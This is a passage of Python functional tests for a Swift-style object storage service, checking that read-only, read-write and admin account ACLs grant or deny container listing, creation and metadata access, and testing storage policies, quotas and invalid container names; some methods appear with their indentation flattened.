                          'X-Container-Write': tf.swift_test_perm[1]})
            return check_response(conn)
        resp = retry(post)
        resp.read()
        self.assertEqual(resp.status, 204)
        # Ensure we can still read the container with the second account
        resp = retry(get2, use_account=2)
        resp.read()
        self.assertEqual(resp.status, 204)
        # And that we can now write with the second account
        resp = retry(put2, use_account=2)
        resp.read()
        self.assertEqual(resp.status, 201)
    def test_nonadmin_user(self):
        """Container ACLs grant a non-admin third account read, then write,
        access (mirrors test_cross_account_public_container but with
        per-user grants via tf.swift_test_perm[2])."""
        if tf.skip or tf.skip3:
            raise SkipTest
        if tf.in_process:
            tf.skip_if_no_xattrs()
        # Obtain the first account's string
        first_account = ['unknown']
        def get1(url, token, parsed, conn):
            # Side effect: capture account 1's storage path for reuse below.
            first_account[0] = parsed.path
            conn.request('HEAD', parsed.path + '/' + self.name, '',
                         {'X-Auth-Token': token})
            return check_response(conn)
        resp = retry(get1)
        resp.read()
        # Ensure we can't access the container with the third account
        def get3(url, token, parsed, conn):
            conn.request('GET', first_account[0] + '/' + self.name, '',
                         {'X-Auth-Token': token})
            return check_response(conn)
        resp = retry(get3, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 403)
        # Make the container accessible by the third account
        def post(url, token, parsed, conn):
            conn.request('POST', parsed.path + '/' + self.name, '',
                         {'X-Auth-Token': token,
                          'X-Container-Read': tf.swift_test_perm[2]})
            return check_response(conn)
        resp = retry(post)
        resp.read()
        self.assertEqual(resp.status, 204)
        # Ensure we can now read the container with the third account
        resp = retry(get3, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 204)
        # But we shouldn't be able to write with the third account
        def put3(url, token, parsed, conn):
            conn.request('PUT', first_account[0] + '/' + self.name + '/object',
                         'test object', {'X-Auth-Token': token})
            return check_response(conn)
        resp = retry(put3, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 403)
        # Now make the container also writable by the third account
        def post(url, token, parsed, conn):
            conn.request('POST', parsed.path + '/' + self.name, '',
                         {'X-Auth-Token': token,
                          'X-Container-Write': tf.swift_test_perm[2]})
            return check_response(conn)
        resp = retry(post)
        resp.read()
        self.assertEqual(resp.status, 204)
        # Ensure we can still read the container with the third account
        resp = retry(get3, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 204)
        # And that we can now write with the third account
        resp = retry(put3, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 201)
@requires_acls
def test_read_only_acl_listings(self):
if tf.skip3:
raise SkipTest
def get(url, token, parsed, conn):
conn.request('GET', parsed.path, '', {'X-Auth-Token': token})
return check_response(conn)
def post_account(url, token, parsed, conn, headers):
new_headers = dict({'X-Auth-Token': token}, **headers)
conn.request('POST', parsed.path, '', new_headers)
return check_response(conn)
def put(url, token, parsed, conn, name):
conn.request('PUT', parsed.path + '/%s' % name, '',
{'X-Auth-Token': token})
return check_response(conn)
# cannot list containers
resp = retry(get, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# grant read-only access
acl_user = tf.swift_test_user[2]
acl = {'read-only': [acl_user]}
headers = {'x-account-access-control': json.dumps(acl)}
resp = retry(post_account, headers=headers, use_account=1)
resp.read()
self.assertEqual(resp.status, 204)
# read-only can list containers
resp = retry(get, use_account=3)
listing = resp.read()
self.assertEqual(resp.status, 200)
self.assertIn(self.name, listing)
# read-only can not create containers
new_container_name = str(uuid4())
resp = retry(put, new_container_name, use_account=3)
resp.read()
self.assertEqual(resp.status, 403)
# but it can see newly created ones
resp = retry(put, new_container_name, use_account=1)
resp.read()
self.assertEqual(resp.status, 201)
resp = retry(get, use_account=3)
listing = resp.read()
self.assertEqual(resp.status, 200)
self.assertIn(new_container_name, listing)
    @requires_acls
    def test_read_only_acl_metadata(self):
        """A read-only account ACL permits reading container metadata but
        rejects writing it (403)."""
        if tf.skip3:
            raise SkipTest
        def get(url, token, parsed, conn, name):
            conn.request('GET', parsed.path + '/%s' % name, '',
                         {'X-Auth-Token': token})
            return check_response(conn)
        def post_account(url, token, parsed, conn, headers):
            new_headers = dict({'X-Auth-Token': token}, **headers)
            conn.request('POST', parsed.path, '', new_headers)
            return check_response(conn)
        def post(url, token, parsed, conn, name, headers):
            new_headers = dict({'X-Auth-Token': token}, **headers)
            conn.request('POST', parsed.path + '/%s' % name, '', new_headers)
            return check_response(conn)
        # add some metadata
        value = str(uuid4())
        headers = {'x-container-meta-test': value}
        resp = retry(post, self.name, headers=headers, use_account=1)
        resp.read()
        self.assertEqual(resp.status, 204)
        resp = retry(get, self.name, use_account=1)
        resp.read()
        self.assertEqual(resp.status, 204)
        self.assertEqual(resp.getheader('X-Container-Meta-Test'), value)
        # cannot see metadata
        resp = retry(get, self.name, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 403)
        # grant read-only access
        acl_user = tf.swift_test_user[2]
        acl = {'read-only': [acl_user]}
        headers = {'x-account-access-control': json.dumps(acl)}
        resp = retry(post_account, headers=headers, use_account=1)
        resp.read()
        self.assertEqual(resp.status, 204)
        # read-only can NOT write container metadata
        new_value = str(uuid4())
        headers = {'x-container-meta-test': new_value}
        resp = retry(post, self.name, headers=headers, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 403)
        # read-only can read container metadata
        resp = retry(get, self.name, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 204)
        self.assertEqual(resp.getheader('X-Container-Meta-Test'), value)
    @requires_acls
    def test_read_write_acl_listings(self):
        """A read-write account ACL allows listing, creating, and deleting
        containers — including containers the grantee didn't create."""
        if tf.skip3:
            raise SkipTest
        def get(url, token, parsed, conn):
            conn.request('GET', parsed.path, '', {'X-Auth-Token': token})
            return check_response(conn)
        def post(url, token, parsed, conn, headers):
            new_headers = dict({'X-Auth-Token': token}, **headers)
            conn.request('POST', parsed.path, '', new_headers)
            return check_response(conn)
        def put(url, token, parsed, conn, name):
            conn.request('PUT', parsed.path + '/%s' % name, '',
                         {'X-Auth-Token': token})
            return check_response(conn)
        def delete(url, token, parsed, conn, name):
            conn.request('DELETE', parsed.path + '/%s' % name, '',
                         {'X-Auth-Token': token})
            return check_response(conn)
        # cannot list containers
        resp = retry(get, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 403)
        # grant read-write access
        acl_user = tf.swift_test_user[2]
        acl = {'read-write': [acl_user]}
        headers = {'x-account-access-control': json.dumps(acl)}
        resp = retry(post, headers=headers, use_account=1)
        resp.read()
        self.assertEqual(resp.status, 204)
        # can list containers
        resp = retry(get, use_account=3)
        listing = resp.read()
        self.assertEqual(resp.status, 200)
        self.assertIn(self.name, listing)
        # can create new containers
        new_container_name = str(uuid4())
        resp = retry(put, new_container_name, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 201)
        resp = retry(get, use_account=3)
        listing = resp.read()
        self.assertEqual(resp.status, 200)
        self.assertIn(new_container_name, listing)
        # can also delete them
        resp = retry(delete, new_container_name, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 204)
        resp = retry(get, use_account=3)
        listing = resp.read()
        self.assertEqual(resp.status, 200)
        self.assertNotIn(new_container_name, listing)
        # even if they didn't create them
        empty_container_name = str(uuid4())
        resp = retry(put, empty_container_name, use_account=1)
        resp.read()
        self.assertEqual(resp.status, 201)
        resp = retry(delete, empty_container_name, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 204)
    @requires_acls
    def test_read_write_acl_metadata(self):
        """A read-write account ACL allows reading, writing, and removing
        container metadata."""
        if tf.skip3:
            raise SkipTest
        def get(url, token, parsed, conn, name):
            conn.request('GET', parsed.path + '/%s' % name, '',
                         {'X-Auth-Token': token})
            return check_response(conn)
        def post_account(url, token, parsed, conn, headers):
            new_headers = dict({'X-Auth-Token': token}, **headers)
            conn.request('POST', parsed.path, '', new_headers)
            return check_response(conn)
        def post(url, token, parsed, conn, name, headers):
            new_headers = dict({'X-Auth-Token': token}, **headers)
            conn.request('POST', parsed.path + '/%s' % name, '', new_headers)
            return check_response(conn)
        # add some metadata
        value = str(uuid4())
        headers = {'x-container-meta-test': value}
        resp = retry(post, self.name, headers=headers, use_account=1)
        resp.read()
        self.assertEqual(resp.status, 204)
        resp = retry(get, self.name, use_account=1)
        resp.read()
        self.assertEqual(resp.status, 204)
        self.assertEqual(resp.getheader('X-Container-Meta-Test'), value)
        # cannot see metadata
        resp = retry(get, self.name, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 403)
        # grant read-write access
        acl_user = tf.swift_test_user[2]
        acl = {'read-write': [acl_user]}
        headers = {'x-account-access-control': json.dumps(acl)}
        resp = retry(post_account, headers=headers, use_account=1)
        resp.read()
        self.assertEqual(resp.status, 204)
        # read-write can read container metadata
        resp = retry(get, self.name, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 204)
        self.assertEqual(resp.getheader('X-Container-Meta-Test'), value)
        # read-write can also write container metadata
        new_value = str(uuid4())
        headers = {'x-container-meta-test': new_value}
        resp = retry(post, self.name, headers=headers, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 204)
        resp = retry(get, self.name, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 204)
        self.assertEqual(resp.getheader('X-Container-Meta-Test'), new_value)
        # and remove it
        headers = {'x-remove-container-meta-test': 'true'}
        resp = retry(post, self.name, headers=headers, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 204)
        resp = retry(get, self.name, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 204)
        self.assertIsNone(resp.getheader('X-Container-Meta-Test'))
    @requires_acls
    def test_admin_acl_listing(self):
        """An admin account ACL allows listing, creating, and deleting
        containers (same coverage as read-write for these operations)."""
        if tf.skip3:
            raise SkipTest
        def get(url, token, parsed, conn):
            conn.request('GET', parsed.path, '', {'X-Auth-Token': token})
            return check_response(conn)
        def post(url, token, parsed, conn, headers):
            new_headers = dict({'X-Auth-Token': token}, **headers)
            conn.request('POST', parsed.path, '', new_headers)
            return check_response(conn)
        def put(url, token, parsed, conn, name):
            conn.request('PUT', parsed.path + '/%s' % name, '',
                         {'X-Auth-Token': token})
            return check_response(conn)
        def delete(url, token, parsed, conn, name):
            conn.request('DELETE', parsed.path + '/%s' % name, '',
                         {'X-Auth-Token': token})
            return check_response(conn)
        # cannot list containers
        resp = retry(get, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 403)
        # grant admin access
        acl_user = tf.swift_test_user[2]
        acl = {'admin': [acl_user]}
        headers = {'x-account-access-control': json.dumps(acl)}
        resp = retry(post, headers=headers, use_account=1)
        resp.read()
        self.assertEqual(resp.status, 204)
        # can list containers
        resp = retry(get, use_account=3)
        listing = resp.read()
        self.assertEqual(resp.status, 200)
        self.assertIn(self.name, listing)
        # can create new containers
        new_container_name = str(uuid4())
        resp = retry(put, new_container_name, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 201)
        resp = retry(get, use_account=3)
        listing = resp.read()
        self.assertEqual(resp.status, 200)
        self.assertIn(new_container_name, listing)
        # can also delete them
        resp = retry(delete, new_container_name, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 204)
        resp = retry(get, use_account=3)
        listing = resp.read()
        self.assertEqual(resp.status, 200)
        self.assertNotIn(new_container_name, listing)
        # even if they didn't create them
        empty_container_name = str(uuid4())
        resp = retry(put, empty_container_name, use_account=1)
        resp.read()
        self.assertEqual(resp.status, 201)
        resp = retry(delete, empty_container_name, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 204)
    @requires_acls
    def test_admin_acl_metadata(self):
        """An admin account ACL allows reading, writing, and removing
        container metadata."""
        if tf.skip3:
            raise SkipTest
        def get(url, token, parsed, conn, name):
            conn.request('GET', parsed.path + '/%s' % name, '',
                         {'X-Auth-Token': token})
            return check_response(conn)
        def post_account(url, token, parsed, conn, headers):
            new_headers = dict({'X-Auth-Token': token}, **headers)
            conn.request('POST', parsed.path, '', new_headers)
            return check_response(conn)
        def post(url, token, parsed, conn, name, headers):
            new_headers = dict({'X-Auth-Token': token}, **headers)
            conn.request('POST', parsed.path + '/%s' % name, '', new_headers)
            return check_response(conn)
        # add some metadata
        value = str(uuid4())
        headers = {'x-container-meta-test': value}
        resp = retry(post, self.name, headers=headers, use_account=1)
        resp.read()
        self.assertEqual(resp.status, 204)
        resp = retry(get, self.name, use_account=1)
        resp.read()
        self.assertEqual(resp.status, 204)
        self.assertEqual(resp.getheader('X-Container-Meta-Test'), value)
        # cannot see metadata
        resp = retry(get, self.name, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 403)
        # grant access
        acl_user = tf.swift_test_user[2]
        acl = {'admin': [acl_user]}
        headers = {'x-account-access-control': json.dumps(acl)}
        resp = retry(post_account, headers=headers, use_account=1)
        resp.read()
        self.assertEqual(resp.status, 204)
        # can read container metadata
        resp = retry(get, self.name, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 204)
        self.assertEqual(resp.getheader('X-Container-Meta-Test'), value)
        # can also write container metadata
        new_value = str(uuid4())
        headers = {'x-container-meta-test': new_value}
        resp = retry(post, self.name, headers=headers, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 204)
        resp = retry(get, self.name, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 204)
        self.assertEqual(resp.getheader('X-Container-Meta-Test'), new_value)
        # and remove it
        headers = {'x-remove-container-meta-test': 'true'}
        resp = retry(post, self.name, headers=headers, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 204)
        resp = retry(get, self.name, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 204)
        self.assertIsNone(resp.getheader('X-Container-Meta-Test'))
    @requires_acls
    def test_protected_container_sync(self):
        """X-Container-Sync-Key is privileged metadata: hidden from and
        unwritable by read-only and read-write grantees, fully visible and
        writable for admin grantees."""
        if tf.skip3:
            raise SkipTest
        def get(url, token, parsed, conn, name):
            conn.request('GET', parsed.path + '/%s' % name, '',
                         {'X-Auth-Token': token})
            return check_response(conn)
        def post_account(url, token, parsed, conn, headers):
            new_headers = dict({'X-Auth-Token': token}, **headers)
            conn.request('POST', parsed.path, '', new_headers)
            return check_response(conn)
        def post(url, token, parsed, conn, name, headers):
            new_headers = dict({'X-Auth-Token': token}, **headers)
            conn.request('POST', parsed.path + '/%s' % name, '', new_headers)
            return check_response(conn)
        # add some metadata
        value = str(uuid4())
        headers = {
            'x-container-sync-key': 'secret',
            'x-container-meta-test': value,
        }
        resp = retry(post, self.name, headers=headers, use_account=1)
        resp.read()
        self.assertEqual(resp.status, 204)
        resp = retry(get, self.name, use_account=1)
        resp.read()
        self.assertEqual(resp.status, 204)
        self.assertEqual(resp.getheader('X-Container-Sync-Key'), 'secret')
        self.assertEqual(resp.getheader('X-Container-Meta-Test'), value)
        # grant read-only access
        acl_user = tf.swift_test_user[2]
        acl = {'read-only': [acl_user]}
        headers = {'x-account-access-control': json.dumps(acl)}
        resp = retry(post_account, headers=headers, use_account=1)
        resp.read()
        self.assertEqual(resp.status, 204)
        # can read container metadata
        resp = retry(get, self.name, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 204)
        self.assertEqual(resp.getheader('X-Container-Meta-Test'), value)
        # but not sync-key
        self.assertIsNone(resp.getheader('X-Container-Sync-Key'))
        # and can not write
        headers = {'x-container-sync-key': str(uuid4())}
        resp = retry(post, self.name, headers=headers, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 403)
        # grant read-write access
        acl_user = tf.swift_test_user[2]
        acl = {'read-write': [acl_user]}
        headers = {'x-account-access-control': json.dumps(acl)}
        resp = retry(post_account, headers=headers, use_account=1)
        resp.read()
        self.assertEqual(resp.status, 204)
        # can read container metadata
        resp = retry(get, self.name, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 204)
        self.assertEqual(resp.getheader('X-Container-Meta-Test'), value)
        # but not sync-key
        self.assertIsNone(resp.getheader('X-Container-Sync-Key'))
        # sanity check sync-key w/ account1
        resp = retry(get, self.name, use_account=1)
        resp.read()
        self.assertEqual(resp.status, 204)
        self.assertEqual(resp.getheader('X-Container-Sync-Key'), 'secret')
        # and can write
        new_value = str(uuid4())
        headers = {
            'x-container-sync-key': str(uuid4()),
            'x-container-meta-test': new_value,
        }
        resp = retry(post, self.name, headers=headers, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 204)
        resp = retry(get, self.name, use_account=1)  # validate w/ account1
        resp.read()
        self.assertEqual(resp.status, 204)
        self.assertEqual(resp.getheader('X-Container-Meta-Test'), new_value)
        # but can not write sync-key
        self.assertEqual(resp.getheader('X-Container-Sync-Key'), 'secret')
        # grant admin access
        acl_user = tf.swift_test_user[2]
        acl = {'admin': [acl_user]}
        headers = {'x-account-access-control': json.dumps(acl)}
        resp = retry(post_account, headers=headers, use_account=1)
        resp.read()
        self.assertEqual(resp.status, 204)
        # admin can read container metadata
        resp = retry(get, self.name, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 204)
        self.assertEqual(resp.getheader('X-Container-Meta-Test'), new_value)
        # and ALSO sync-key
        self.assertEqual(resp.getheader('X-Container-Sync-Key'), 'secret')
        # admin tester3 can even change sync-key
        new_secret = str(uuid4())
        headers = {'x-container-sync-key': new_secret}
        resp = retry(post, self.name, headers=headers, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 204)
        resp = retry(get, self.name, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 204)
        self.assertEqual(resp.getheader('X-Container-Sync-Key'), new_secret)
    @requires_acls
    def test_protected_container_acl(self):
        """Container ACL headers (X-Container-Read/Write) are *protected*
        container metadata: account-level 'read-only' and 'read-write'
        grantees can read and write plain container metadata but can neither
        see nor change the container ACLs; only an 'admin' grantee can.
        """
        if tf.skip3:
            raise SkipTest

        def get(url, token, parsed, conn, name):
            # GET the named container; response headers carry the metadata.
            conn.request('GET', parsed.path + '/%s' % name, '',
                         {'X-Auth-Token': token})
            return check_response(conn)

        def post_account(url, token, parsed, conn, headers):
            # POST to the account path, merging the auth token into *headers*.
            new_headers = dict({'X-Auth-Token': token}, **headers)
            conn.request('POST', parsed.path, '', new_headers)
            return check_response(conn)

        def post(url, token, parsed, conn, name, headers):
            # POST to the named container, merging the auth token in.
            new_headers = dict({'X-Auth-Token': token}, **headers)
            conn.request('POST', parsed.path + '/%s' % name, '', new_headers)
            return check_response(conn)

        # add some container acls
        value = str(uuid4())
        headers = {
            'x-container-read': 'jdoe',
            'x-container-write': 'jdoe',
            'x-container-meta-test': value,
        }
        resp = retry(post, self.name, headers=headers, use_account=1)
        resp.read()
        self.assertEqual(resp.status, 204)
        # owner (account 1) sees ACLs and metadata
        resp = retry(get, self.name, use_account=1)
        resp.read()
        self.assertEqual(resp.status, 204)
        self.assertEqual(resp.getheader('X-Container-Read'), 'jdoe')
        self.assertEqual(resp.getheader('X-Container-Write'), 'jdoe')
        self.assertEqual(resp.getheader('X-Container-Meta-Test'), value)
        # grant read-only access
        acl_user = tf.swift_test_user[2]
        acl = {'read-only': [acl_user]}
        headers = {'x-account-access-control': json.dumps(acl)}
        resp = retry(post_account, headers=headers, use_account=1)
        resp.read()
        self.assertEqual(resp.status, 204)
        # can read container metadata
        resp = retry(get, self.name, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 204)
        self.assertEqual(resp.getheader('X-Container-Meta-Test'), value)
        # but not container acl
        self.assertIsNone(resp.getheader('X-Container-Read'))
        self.assertIsNone(resp.getheader('X-Container-Write'))
        # and can not write
        headers = {
            'x-container-read': 'frank',
            'x-container-write': 'frank',
        }
        resp = retry(post, self.name, headers=headers, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 403)
        # grant read-write access
        acl_user = tf.swift_test_user[2]
        acl = {'read-write': [acl_user]}
        headers = {'x-account-access-control': json.dumps(acl)}
        resp = retry(post_account, headers=headers, use_account=1)
        resp.read()
        self.assertEqual(resp.status, 204)
        # can read container metadata
        resp = retry(get, self.name, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 204)
        self.assertEqual(resp.getheader('X-Container-Meta-Test'), value)
        # but not container acl
        self.assertIsNone(resp.getheader('X-Container-Read'))
        self.assertIsNone(resp.getheader('X-Container-Write'))
        # sanity check container acls with account1
        resp = retry(get, self.name, use_account=1)
        resp.read()
        self.assertEqual(resp.status, 204)
        self.assertEqual(resp.getheader('X-Container-Read'), 'jdoe')
        self.assertEqual(resp.getheader('X-Container-Write'), 'jdoe')
        # and can write
        new_value = str(uuid4())
        headers = {
            'x-container-read': 'frank',
            'x-container-write': 'frank',
            'x-container-meta-test': new_value,
        }
        resp = retry(post, self.name, headers=headers, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 204)
        resp = retry(get, self.name, use_account=1)  # validate w/ account1
        resp.read()
        self.assertEqual(resp.status, 204)
        self.assertEqual(resp.getheader('X-Container-Meta-Test'), new_value)
        # but can not write container acls
        self.assertEqual(resp.getheader('X-Container-Read'), 'jdoe')
        self.assertEqual(resp.getheader('X-Container-Write'), 'jdoe')
        # grant admin access
        acl_user = tf.swift_test_user[2]
        acl = {'admin': [acl_user]}
        headers = {'x-account-access-control': json.dumps(acl)}
        resp = retry(post_account, headers=headers, use_account=1)
        resp.read()
        self.assertEqual(resp.status, 204)
        # admin can read container metadata
        resp = retry(get, self.name, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 204)
        self.assertEqual(resp.getheader('X-Container-Meta-Test'), new_value)
        # and ALSO container acls
        self.assertEqual(resp.getheader('X-Container-Read'), 'jdoe')
        self.assertEqual(resp.getheader('X-Container-Write'), 'jdoe')
        # admin tester3 can even change container acls
        new_value = str(uuid4())
        headers = {
            'x-container-read': '.r:*',
        }
        resp = retry(post, self.name, headers=headers, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 204)
        resp = retry(get, self.name, use_account=3)
        resp.read()
        self.assertEqual(resp.status, 204)
        self.assertEqual(resp.getheader('X-Container-Read'), '.r:*')
def test_long_name_content_type(self):
if tf.skip:
raise SkipTest
def put(url, token, parsed, conn):
container_name = 'X' * 2048
conn.request('PUT', '%s/%s' % (parsed.path, container_name),
'there', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 400)
self.assertEqual(resp.getheader('Content-Type'),
'text/html; charset=UTF-8')
def test_null_name(self):
if tf.skip:
raise SkipTest
def put(url, token, parsed, conn):
conn.request('PUT', '%s/abc%%00def' % parsed.path, '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(put)
if (tf.web_front_end == 'apache2'):
self.assertEqual(resp.status, 404)
else:
self.assertEqual(resp.read(), 'Invalid UTF8 or contains NULL')
self.assertEqual(resp.status, 412)
def test_create_container_gets_default_policy_by_default(self):
try:
default_policy = \
tf.FunctionalStoragePolicyCollection.from_info().default
except AssertionError:
raise SkipTest()
def put(url, token, parsed, conn):
# using the empty storage policy header value here to ensure
# that the default policy is chosen in case policy_specified is set
# see __init__.py for details on policy_specified
conn.request('PUT', parsed.path + '/' + self.container, '',
{'X-Auth-Token': token, 'X-Storage-Policy': ''})
return check_response(conn)
resp = retry(put)
resp.read()
self.assertEqual(resp.status // 100, 2)
def head(url, token, parsed, conn):
conn.request('HEAD', parsed.path + '/' + self.container, '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(head)
resp.read()
headers = dict((k.lower(), v) for k, v in resp.getheaders())
self.assertEqual(headers.get('x-storage-policy'),
default_policy['name'])
def test_error_invalid_storage_policy_name(self):
def put(url, token, parsed, conn, headers):
new_headers = dict({'X-Auth-Token': token}, **headers)
conn.request('PUT', parsed.path + '/' + self.container, '',
new_headers)
return check_response(conn)
# create
resp = retry(put, {'X-Storage-Policy': uuid4().hex})
resp.read()
self.assertEqual(resp.status, 400)
@requires_policies
def test_create_non_default_storage_policy_container(self):
policy = self.policies.exclude(default=True).select()
def put(url, token, parsed, conn, headers=None):
base_headers = {'X-Auth-Token': token}
if headers:
base_headers.update(headers)
conn.request('PUT', parsed.path + '/' + self.container, '',
base_headers)
return check_response(conn)
headers = {'X-Storage-Policy': policy['name']}
resp = retry(put, headers=headers)
resp.read()
self.assertEqual(resp.status, 201)
def head(url, token, parsed, conn):
conn.request('HEAD', parsed.path + '/' + self.container, '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(head)
resp.read()
headers = dict((k.lower(), v) for k, v in resp.getheaders())
self.assertEqual(headers.get('x-storage-policy'),
policy['name'])
# and test recreate with-out specifying Storage Policy
resp = retry(put)
resp.read()
self.assertEqual(resp.status, 202)
# should still be original storage policy
resp = retry(head)
resp.read()
headers = dict((k.lower(), v) for k, v in resp.getheaders())
self.assertEqual(headers.get('x-storage-policy'),
policy['name'])
# delete it
def delete(url, token, parsed, conn):
conn.request('DELETE', parsed.path + '/' + self.container, '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(delete)
resp.read()
self.assertEqual(resp.status, 204)
# verify no policy header
resp = retry(head)
resp.read()
headers = dict((k.lower(), v) for k, v in resp.getheaders())
self.assertIsNone(headers.get('x-storage-policy'))
@requires_policies
def test_conflict_change_storage_policy_with_put(self):
def put(url, token, parsed, conn, headers):
new_headers = dict({'X-Auth-Token': token}, **headers)
conn.request('PUT', parsed.path + '/' + self.container, '',
new_headers)
return check_response(conn)
# create
policy = self.policies.select()
resp = retry(put, {'X-Storage-Policy': policy['name']})
resp.read()
self.assertEqual(resp.status, 201)
# can't change it
other_policy = self.policies.exclude(name=policy['name']).select()
resp = retry(put, {'X-Storage-Policy': other_policy['name']})
resp.read()
self.assertEqual(resp.status, 409)
def head(url, token, parsed, conn):
conn.request('HEAD', parsed.path + '/' + self.container, '',
{'X-Auth-Token': token})
return check_response(conn)
# still original policy
resp = retry(head)
resp.read()
headers = dict((k.lower(), v) for k, v in resp.getheaders())
self.assertEqual(headers.get('x-storage-policy'),
policy['name'])
@requires_policies
def test_noop_change_storage_policy_with_post(self):
def put(url, token, parsed, conn, headers):
new_headers = dict({'X-Auth-Token': token}, **headers)
conn.request('PUT', parsed.path + '/' + self.container, '',
new_headers)
return check_response(conn)
# create
policy = self.policies.select()
resp = retry(put, {'X-Storage-Policy': policy['name']})
resp.read()
self.assertEqual(resp.status, 201)
def post(url, token, parsed, conn, headers):
new_headers = dict({'X-Auth-Token': token}, **headers)
conn.request('POST', parsed.path + '/' + self.container, '',
new_headers)
return check_response(conn)
# attempt update
for header in ('X-Storage-Policy', 'X-Storage-Policy-Index'):
other_policy = self.policies.exclude(name=policy['name']).select()
resp = retry(post, {header: other_policy['name']})
resp.read()
self.assertEqual(resp.status, 204)
def head(url, token, parsed, conn):
conn.request('HEAD', parsed.path + '/' + self.container, '',
{'X-Auth-Token': token})
return check_response(conn)
# still original policy
resp = retry(head)
resp.read()
headers = dict((k.lower(), v) for k, v in resp.getheaders())
self.assertEqual(headers.get('x-storage-policy'),
policy['name'])
def test_container_quota_bytes(self):
if 'container_quotas' not in cluster_info:
raise SkipTest('Container quotas not enabled')
if tf.in_process:
tf.skip_if_no_xattrs()
def post(url, token, parsed, conn, name, value):
conn.request('POST', parsed.path + '/' + self.name, '',
{'X-Auth-Token': token, name: value})
return check_response(conn)
def head(url, token, parsed, conn):
conn.request('HEAD', parsed.path + '/' + self.name, '',
{'X-Auth-Token': token})
return check_response(conn)
# set X-Container-Meta-Quota-Bytes is 10
resp = retry(post, 'X-Container-Meta-Quota-Bytes', '10')
resp.read()
self.assertEqual(resp.status, 204)
resp = retry(head)
resp.read()
self.assertIn(resp.status, (200, 204))
# confirm X-Container-Meta-Quota-Bytes
self.assertEqual(resp.getheader('X-Container-Meta-Quota-Bytes'), '10')
def put(url, token, parsed, conn, data):
conn.request('PUT', parsed.path + '/' + self.name + '/object',
data, {'X-Auth-Token': token})
return check_response(conn)
# upload 11 bytes object
resp = retry(put, '01234567890')
resp.read()
self.assertEqual(resp.status, 413)
# upload 10 bytes object
resp = retry(put, '0123456789')
resp.read()
self.assertEqual(resp.status, 201)
def get(url, token, parsed, conn):
conn.request('GET', parsed.path + '/' + self.name + '/object',
'', {'X-Auth-Token': token})
return check_response(conn)
# download 10 bytes object
resp = retry(get)
body = resp.read()
self.assertEqual(resp.status, 200)
self.assertEqual(body, '0123456789')
class BaseTestContainerACLs(unittest2.TestCase):
    """Base class for cross-account container ACL tests (Keystone v3 only).

    setUp creates a fresh container in ``self.account``; tearDown empties
    and deletes it, so every test starts from a private container.
    """
    # subclasses can change the account in which container
    # is created/deleted by setUp/tearDown
    account = 1

    def _get_account(self, url, token, parsed, conn):
        # retry() helper: returns the account's storage path (e.g.
        # '/v1/AUTH_<tenant_id>').
        return parsed.path

    def _get_tenant_id(self, url, token, parsed, conn):
        # retry() helper: strips the '/v1/AUTH_' prefix from the storage
        # path, leaving the tenant/project id.
        account = parsed.path
        return account.replace('/v1/AUTH_', '', 1)

    def setUp(self):
        if tf.skip or tf.skip2 or tf.skip_if_not_v3:
            raise SkipTest('AUTH VERSION 3 SPECIFIC TEST')
        self.name = uuid4().hex

        def put(url, token, parsed, conn):
            conn.request('PUT', parsed.path + '/' + self.name, '',
                         {'X-Auth-Token': token})
            return check_response(conn)

        resp = retry(put, use_account=self.account)
        resp.read()
        self.assertEqual(resp.status, 201)

    def tearDown(self):
        if tf.skip or tf.skip2 or tf.skip_if_not_v3:
            raise SkipTest

        def get(url, token, parsed, conn):
            conn.request('GET', parsed.path + '/' + self.name + '?format=json',
                         '', {'X-Auth-Token': token})
            return check_response(conn)

        def delete(url, token, parsed, conn, obj):
            conn.request('DELETE',
                         '/'.join([parsed.path, self.name, obj['name']]), '',
                         {'X-Auth-Token': token})
            return check_response(conn)

        # Drain the container: listings are limited, so list and delete
        # repeatedly until an empty listing comes back.
        while True:
            resp = retry(get, use_account=self.account)
            body = resp.read()
            self.assertEqual(resp.status // 100, 2, resp.status)
            objs = json.loads(body)
            if not objs:
                break
            for obj in objs:
                resp = retry(delete, obj, use_account=self.account)
                resp.read()
                self.assertEqual(resp.status, 204)

